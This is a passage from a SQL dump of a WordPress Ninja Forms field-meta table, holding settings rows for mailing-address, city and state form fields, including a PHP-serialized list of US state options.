id','4','parent_id','4'),(15068,499,'idAttribute','id','idAttribute','id'),(15069,499,'drawerDisabled','','drawerDisabled',''),(15070,500,'custom_name_attribute','address','custom_name_attribute','address'),(15071,500,'personally_identifiable','1','personally_identifiable','1'),(15072,500,'value','','value',''),(15073,500,'custom_mask','','custom_mask',''),(15074,500,'manual_key','','manual_key',''),(15075,500,'container_class','one-half first','container_class','one-half first'),(15076,500,'default','','default',''),(15077,500,'field_key','street_address_add_or_update_mailing_address_1616603898544','field_key','street_address_add_or_update_mailing_address_1616603898544'),(15078,500,'field_label','Street Address (add or update mailing address)','field_label','Street Address (add or update mailing address)'),(15079,500,'editActive','','editActive',''),(15080,500,'type','address','type','address'),(15081,500,'order','6','order','6'),(15082,500,'fav_id','','fav_id',''),(15083,500,'def_id','8','def_id','8'),(15084,500,'label','Street Address (add or update mailing address)','label','Street Address (add or update mailing address)'),(15085,500,'label_pos','above','label_pos','above'),(15086,500,'mask','','mask',''),(15087,500,'datepicker','0','datepicker','0'),(15088,500,'send_email','0','send_email','0'),(15089,500,'from_email','0','from_email','0'),(15090,500,'first_name','0','first_name','0'),(15091,500,'last_name','0','last_name','0'),(15092,500,'from_name','0','from_name','0'),(15093,500,'user_address_2','0','user_address_2','0'),(15094,500,'user_city','0','user_city','0'),(15095,500,'user_zip','0','user_zip','0'),(15096,500,'user_info_field_group','1','user_info_field_group','1'),(15097,500,'show_help','0','show_help','0'),(15098,500,'help_text','','help_text',''),(15099,500,'calc_auto_include','0','calc_auto_include','0'),(15100,500,'calc_option','0','calc_option','0'),(15101,500,'placeholder','','placeholder',''),(15102,500,'user_phone','','user_phone',''),(15103,500,'user_email','','user_email',''),(15104,500,'disable_input','0','disable_input','0'),(15105,500,'input_limit','','input_limit',''),(15106,500,'input_limit_type','char','input_limit_type','char'),(15107,500,'input_limit_msg','','input_limit_msg',''),(15108,500,'user_state','0','user_state','0'),(15109,500,'autocomplete_off','0','autocomplete_off','0'),(15110,500,'num_sort','0','num_sort','0'),(15111,500,'admin_label','','admin_label',''),(15112,500,'user_info_field_group_name','','user_info_field_group_name',''),(15113,500,'user_info_field_group_custom','','user_info_field_group_custom',''),(15114,500,'show_desc','0','show_desc','0'),(15115,500,'desc_pos','none','desc_pos','none'),(15116,500,'desc_text','','desc_text',''),(15117,500,'element_class','','element_class',''),(15118,500,'required','0','required','0'),(15119,500,'key','street_address_add_or_update_mailing_address_1616603898544','key','street_address_add_or_update_mailing_address_1616603898544'),(15120,500,'parent_id','4','parent_id','4'),(15121,500,'idAttribute','id','idAttribute','id'),(15122,500,'drawerDisabled','','drawerDisabled',''),(15123,501,'editActive','','editActive',''),(15124,501,'field_label','City','field_label','City'),(15125,501,'field_key','city_216','field_key','city_216'),(15126,501,'default','','default',''),(15127,501,'container_class','one-half','container_class','one-half'),(15128,501,'manual_key','','manual_key',''),(15129,501,'custom_mask','','custom_mask',''),(15130,501,'custom_name_attribute','city','custom_name_attribute','city'),(15131,501,'personally_identifiable','','personally_identifiable',''),(15132,501,'value','','value',''),(15133,501,'type','city','type','city'),(15134,501,'order','7','order','7'),(15135,501,'fav_id','','fav_id',''),(15136,501,'def_id','10','def_id','10'),(15137,501,'label','City','label','City'),(15138,501,'label_pos','above','label_pos','above'),(15139,501,'mask','','mask',''),(15140,501,'datepicker','0','datepicker','0'),(15141,501,'send_email','0','send_email','0'),(15142,501,'from_email','0','from_email','0'),(15143,501,'first_name','0','first_name','0'),(15144,501,'last_name','0','last_name','0'),(15145,501,'from_name','0','from_name','0'),(15146,501,'user_address_1','0','user_address_1','0'),(15147,501,'user_address_2','0','user_address_2','0'),(15148,501,'user_zip','0','user_zip','0'),(15149,501,'user_info_field_group','1','user_info_field_group','1'),(15150,501,'show_help','0','show_help','0'),(15151,501,'help_text','','help_text',''),(15152,501,'calc_auto_include','0','calc_auto_include','0'),(15153,501,'calc_option','0','calc_option','0'),(15154,501,'placeholder','','placeholder',''),(15155,501,'user_phone','','user_phone',''),(15156,501,'user_email','','user_email',''),(15157,501,'disable_input','0','disable_input','0'),(15158,501,'input_limit','','input_limit',''),(15159,501,'input_limit_type','char','input_limit_type','char'),(15160,501,'input_limit_msg','','input_limit_msg',''),(15161,501,'user_state','0','user_state','0'),(15162,501,'autocomplete_off','0','autocomplete_off','0'),(15163,501,'num_sort','0','num_sort','0'),(15164,501,'admin_label','','admin_label',''),(15165,501,'user_info_field_group_name','','user_info_field_group_name',''),(15166,501,'user_info_field_group_custom','','user_info_field_group_custom',''),(15167,501,'show_desc','0','show_desc','0'),(15168,501,'desc_pos','none','desc_pos','none'),(15169,501,'desc_text','','desc_text',''),(15170,501,'element_class','','element_class',''),(15171,501,'required','0','required','0'),(15172,501,'key','city_216','key','city_216'),(15173,501,'parent_id','4','parent_id','4'),(15174,501,'idAttribute','id','idAttribute','id'),(15175,501,'drawerDisabled','','drawerDisabled',''),(15176,502,'editActive','','editActive',''),(15177,502,'field_label','State','field_label','State'),(15178,502,'field_key','listselect_218','field_key','listselect_218'),(15179,502,'container_class','one-half first','container_class','one-half first'),(15180,502,'type','listselect','type','listselect'),(15181,502,'order','8','order','8'),(15182,502,'fav_id','','fav_id',''),(15183,502,'def_id','11','def_id','11'),(15184,502,'label','State','label','State'),(15185,502,'label_pos','above','label_pos','above'),(15186,502,'multi_size','5','multi_size','5'),(15187,502,'list_show_value','1','list_show_value','1'),(15188,502,'list','a:0:{}','list','a:0:{}'),(15189,502,'list_type','dropdown','list_type','dropdown'),(15190,502,'user_state','1','user_state','1'),(15191,502,'user_info_field_group','1','user_info_field_group','1'),(15192,502,'populate_term','','populate_term',''),(15193,502,'show_help','0','show_help','0'),(15194,502,'help_text','','help_text',''),(15195,502,'calc_auto_include','0','calc_auto_include','0'),(15196,502,'calc_option','0','calc_option','0'),(15197,502,'num_sort','0','num_sort','0'),(15198,502,'admin_label','','admin_label',''),(15199,502,'user_info_field_group_name','','user_info_field_group_name',''),(15200,502,'user_info_field_group_custom','','user_info_field_group_custom',''),(15201,502,'show_desc','0','show_desc','0'),(15202,502,'desc_pos','none','desc_pos','none'),(15203,502,'desc_text','','desc_text',''),(15204,502,'element_class','','element_class',''),(15205,502,'required','0','required','0'),(15206,502,'options','a:52:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:24:\"Please Choose Your State\";s:5:\"value\";s:24:\"Please Choose Your State\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 